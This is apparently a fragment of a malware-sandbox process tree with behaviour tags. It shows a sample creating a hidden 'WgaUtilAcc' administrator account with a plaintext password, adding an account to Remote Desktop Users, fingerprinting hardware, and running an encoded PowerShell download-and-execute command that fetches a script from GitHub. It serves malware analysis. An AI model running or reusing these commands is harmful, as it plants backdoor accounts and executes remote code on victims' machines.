C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4164 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD3⤵PID:856
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:356 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1392
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc agVLh50q1⤵
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc agVLh50q2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc agVLh50q3⤵PID:1668
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2164
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:4132
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3832
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:824
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1772
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:4812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1624
-
-